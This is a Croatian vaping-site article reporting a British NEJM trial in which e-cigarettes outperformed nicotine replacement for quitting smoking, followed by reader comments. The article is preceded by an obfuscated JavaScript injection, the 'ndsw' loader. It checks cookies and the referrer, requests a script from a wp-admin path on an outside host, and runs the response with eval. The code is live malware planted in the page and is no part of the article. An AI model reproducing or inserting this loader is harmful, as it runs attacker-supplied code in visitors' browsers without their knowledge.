;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

STUDIJA O ZAMJENAMA ZA CIGARETE: E-CIGARETA POBJEĐUJE

Britanska studija uzdrmala je mali svijet prestanka pušenja. Pokazalo se da je e-cigareta puno učinkovitija od bilo koje druge metode prestanka pušenja.  

Što kaže znanost

Nova studija, objavljena ove srijede u New England Journal of Medicine, dala je vapingu novi rang među metodama prestanka pušenja: točno na vrhu, glavom i ramenima iznad ostalih. 

To bi trebalo dati municije ljudima koji podržavaju ovu metodu prestanka pušenja i promijeniti stvari za FDA u SAD-u gdje je NEJM naširoko čitan i vrlo cijenjen. FDA zapravo razmatra niz vrlo strogih mjera protiv vapinga i čak optužuje vaping da potiče mlade ljude na pušenje. FDA će se boriti da okalja ugled ove vrlo učinkovite metode prestanka pušenja u ime kontrole duhana. 

Jedna studija koja uspoređuje vaping s farmaceutskim proizvodima za zamjenu nikotina zaista je potresla stvari. 

Uz potporu Programa procjene zdravstvene tehnologije Nacionalnog instituta za zdravstvena istraživanja (NIHR), plus bespovratna sredstva Britanske jedinice za prevenciju istraživanja raka, studiju je vodio Peter Hajek, vodeći borac protiv pušenja u Britaniji. Tim od 13 liječnika, psihologa i farmaceuta prihvatio se izazova usporedbe učinkovitosti vapinga s drugim metodama prestanka pušenja. 

886 pušača praćeno tijekom 12 mjeseci 

Tim je radio sa slučajnom grupom odraslih koji su koristili usluge britanske nacionalne zdravstvene službe za prestanak pušenja. Sudionicima je dodijeljen ili nadomjesni proizvod za nikotin, ili kombinacija proizvoda, koja će biti dostavljena do tri mjeseca ili početni kit za e-cigarete (druga generacija, e-cigareta koja se može puniti i boca e-tekućine koja sadrži 18 mg nikotina) , te preporučili kupnju novih e-tekućina prema njihovom ukusu i željenoj jačini nikotina. 

Studija je uključivala dobrovoljne pacijente, koji su imali izbor između vapinga i drugih nadomjestaka, flastera, sprejeva i nikotinskih žvakaćih guma. 

Liječenje je uključivalo tjednu podršku u ponašanju tijekom najmanje 4 tjedna. Primarni ishod bila je trajna apstinencija tijekom jedne godine, što je biokemijski testirano tijekom posljednjeg posjeta. Sudionici koji su napustili studiju ili koji nisu uspjeli dati rezultat biokemijskog testa nisu smatrani apstinentima. Sekundarni ishodi uključivali su korištenje liječenja i respiratorne simptome koje su prijavili sudionici studije. 

Učinkovitost od 18% 

Studija je ukupno analizirala rezultate od 886 sudionika. Jednogodišnja stopa apstinencije bila je 18,0% u skupini koja je koristila vaping, u usporedbi s 9,9% u skupini koja je koristila druge nikotinske zamjene (npr. flastere, gume). 

Među vaperima, 18% je prestalo pušiti nakon 52 tjedna, u usporedbi s 9% sudionika koji su koristili druge metode. 

Među sudionicima koji su apstinirali godinu dana, oni u skupini koja je koristila vaping imali su veću vjerojatnost da će koristiti svoj dodijeljeni proizvod nakon 52 tjedna od onih u skupini koja je koristila nadomjestak za nikotin (80% v. 9%). 

Općenito, iritacija grla ili usta češće je prijavljivana u skupini koja je primala e-cigarete (65,3% v. 51,2% u skupini koja je primala nadomjesne nikotinske proizvode), a mučnina češće u skupini koja je primala nadomjesne nikotinske proizvode (37,9% v. 31,3% u skupini koja je primala e-cigarete). 

Pušači u skupini e-cigareta izvijestili su o većem smanjenju incidencije kašlja i proizvodnje sluzi od početne vrijednosti do 52 tjedna nego pušači u skupini koja je primala nadomjestak nikotina. Nije bilo značajnih razlika između skupina u pogledu otežanog disanja ili nedostatka zraka. 

Francuska znanost zaostaje 

Mnogi stručnjaci za prestanak pušenja sumnjali su da bi vaping bio učinkovitiji za prestanak pušenja od farmaceutskih proizvoda za zamjenu nikotina. Studija “Randomizirano ispitivanje e-cigareta protiv nikotinske zamjenske terapije” pružila je znanstveni dokaz. 

Studija – prva u svijetu – jača argumente za vaping. 

Ipak, moramo pažljivo razmotriti rezultate. Tim je svakom pacijentu dao identičan početni kit, s uputama za odabir vlastite e-tekućine. Davanje mogućnosti svakoj osobi da odabere vlastiti komplet možda je malo poboljšalo rezultate za vaping. Unatoč tome, rezultat je iznimno zadovoljavajući. 

Komparativna studija s medicinskim nadomjescima još je u tijeku. 

Ne može se usporediti s četverogodišnjom studijom ECSMOKE koja je trenutno u tijeku, a koju vodi dr. Berlin u ime grupe Pariške sveučilišne bolnice AP-HP. ECSMOKE proučava metode odvikavanja, uključujući medicinske tretmane, za razliku od engleske studije koja je ispitivala samo metode prestanka. Preliminarni rezultati ne očekuju se najmanje dvije godine. 

Ali poanta je sljedeća: ako odaberete vaping, vjerojatnost da ćete uspjeti barem je dvostruko veća nego ako koristite bilo koju drugu zamjenu za nikotin. 

Izvor: “Randomizirano ispitivanje e-cigareta protiv nikotinske zamjenske terapije” New England Journal of Medicine 

Choose your Reaction!
 • 2017 sam presao na paru, od tada nisam zapalio cigaretu, ovoga ljeta imali smo festu, malo se više popilo i zapalio sam jednu, povukao sam mozda 4, 5 puta i bacio sam…
  To je toliko smrdilo, uzasan okus u grlu…KOMA!!!!
  Kak bi rekli nasi stari… Nikad više!

 • Iskreno, prije nego sam krenuo u vaping nisam nikad ozbiljno ni pomislio da bih se ostavio cigareta.
  No, drago mi je što sam imao Vape kao izbor nadohvat ruke, jer tog 07.04. ove godine mi je stvarno bio pun kufer
  duhana i baš sam imao potrebu da se maknem od te odvratne navike.
  I za kratko vrijeme sam osjetio samo benfite u odnosu na klasičnu cigaretu.
  Moram napomenuti da nisam imao neke specijalne krize u ovom vremenu odvikavanja od cigarete,
  dogodilo se samo jedan put i to kad mi je Wiip uređaj odbio suradnju, to jest krepao je.

  E, sad…iskreno, nisam siguran da li sam se ja permanentno riješio cigareta ili je to samo privid.
  Ne bih htio baš testirati, ali vjerujem da sve dok imam Vape opremu i tekućine nadohvat ruke
  nemam nikakvih problema ni želje za cigaretom.
  Znači, iz čiste znatiželje sam u ovom periodu koliko Vejpam, zapalio nekoliko cigareta.
  I gotovih i motanih i moram reći da su mi prve bile stvarno odvratne i ne bih ih ni dovršio do kraja.
  Dok zadnjih par koje sam zapalio, te bih izdimio do kraja, nije mi smetalo ali nisam osjetio ni neku naročitu ugodu.
  Ponavljam, htio sam sam sebe istestirati i stvarno nisam osjetio nakon te jedne zapaljene cigarete želju za još.

  Kako god, ostajem na Vejpu…klasične cigarete i sve ono negativno što sam dobivao korištenjem istih jednostavno ne dolaze više u obzir.

  • Zanimljivo je kako ti klasične cigarete postanu odvratne nakon vejpa, jel da? Ja parim već nekih 10 godina i bilo je situacija kad sam zapalila cigaretu, ali mi je svaki put bila ogavna. Da nije toga možda bih u nekom trenutku i pokleknula, ali ovako nema šanse.

Leave a Comment